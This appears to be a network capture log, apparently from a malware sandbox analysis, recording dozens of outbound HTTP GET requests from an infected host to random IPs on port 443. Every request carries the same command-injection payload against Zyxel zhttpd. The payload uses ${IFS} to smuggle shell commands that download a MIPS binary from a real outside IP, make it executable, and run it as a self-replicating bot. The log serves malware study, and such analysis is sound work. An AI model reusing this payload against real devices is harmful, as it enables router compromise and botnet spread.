                                      Jan 19, 2024 17:29:49.113815069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8503192.168.2.1448258154.91.142.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113873005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8504192.168.2.1455958152.101.141.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113898039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8505192.168.2.145729098.164.235.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113948107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8506192.168.2.1435734146.56.98.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113976002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8507192.168.2.143647095.100.17.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114053011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8508192.168.2.144595641.77.223.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114094019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8509192.168.2.1453622164.220.112.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114116907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8510192.168.2.1451014105.75.85.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114156008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8511192.168.2.144237848.166.34.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114185095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8512192.168.2.1451480106.252.80.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114228010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8513192.168.2.144963451.50.129.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114259958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8514192.168.2.1459812162.165.233.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114285946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8515192.168.2.14544102.11.119.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114336014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8516192.168.2.144044849.119.197.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114347935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8517192.168.2.1444014217.156.178.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114402056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8518192.168.2.1454960138.45.122.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114437103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8519192.168.2.1436634119.210.174.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114461899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8520192.168.2.145789434.32.97.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114485025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8521192.168.2.1454824155.142.80.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114536047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8522192.168.2.1459334154.139.152.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114586115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8523192.168.2.145593818.117.154.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114645004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8524192.168.2.1437740111.16.211.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114669085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8525192.168.2.1435094138.120.187.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114726067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8526192.168.2.144429240.101.254.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114746094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8527192.168.2.14537788.94.42.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114801884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8528192.168.2.1434530204.153.244.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114841938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8529192.168.2.14408448.104.158.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114871979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8530192.168.2.1440964102.0.48.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114918947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8531192.168.2.1433816132.165.131.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114970922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8532192.168.2.144798282.122.224.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.114994049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8533192.168.2.14574884.177.37.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115029097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8534192.168.2.1456780159.202.162.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115057945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8535192.168.2.144616095.28.73.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115098953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8536192.168.2.1448724176.85.169.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115148067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8537192.168.2.1439790108.46.215.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115178108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8538192.168.2.1443554159.86.128.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115211010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8539192.168.2.145031038.31.243.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115258932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8540192.168.2.1435060159.54.49.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115299940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8541192.168.2.1433830107.10.159.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115364075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8542192.168.2.1442992146.31.28.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115403891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8543192.168.2.1442614178.98.89.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115464926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8544192.168.2.145974854.10.122.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115494967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8545192.168.2.143518048.137.55.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115528107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8546192.168.2.144105897.123.206.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115547895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8547192.168.2.143517614.87.22.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115622044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8548192.168.2.1436346173.90.215.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115648985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8549192.168.2.1436198203.115.98.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115679979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8550192.168.2.1459148107.13.86.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115732908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8551192.168.2.1456330193.51.106.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115770102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8552192.168.2.1439504200.152.253.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115820885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8553192.168.2.1437656175.15.134.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115856886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8554192.168.2.146097695.167.137.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115881920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8555192.168.2.143864631.234.154.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115933895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8556192.168.2.144768495.141.87.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115950108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8557192.168.2.1449974174.43.28.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115974903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8558192.168.2.145352452.231.173.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.115998030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8559192.168.2.145594661.54.154.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116121054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8560192.168.2.1435456168.133.218.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116175890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8561192.168.2.1438562107.50.40.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116198063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8562192.168.2.14372362.168.11.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116224051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8563192.168.2.145752636.133.82.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116302013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8564192.168.2.144160867.140.136.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116334915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8565192.168.2.1442362150.128.126.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116377115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8566192.168.2.1443446139.44.206.205443
                                      TimestampBytes transferredDirectionData
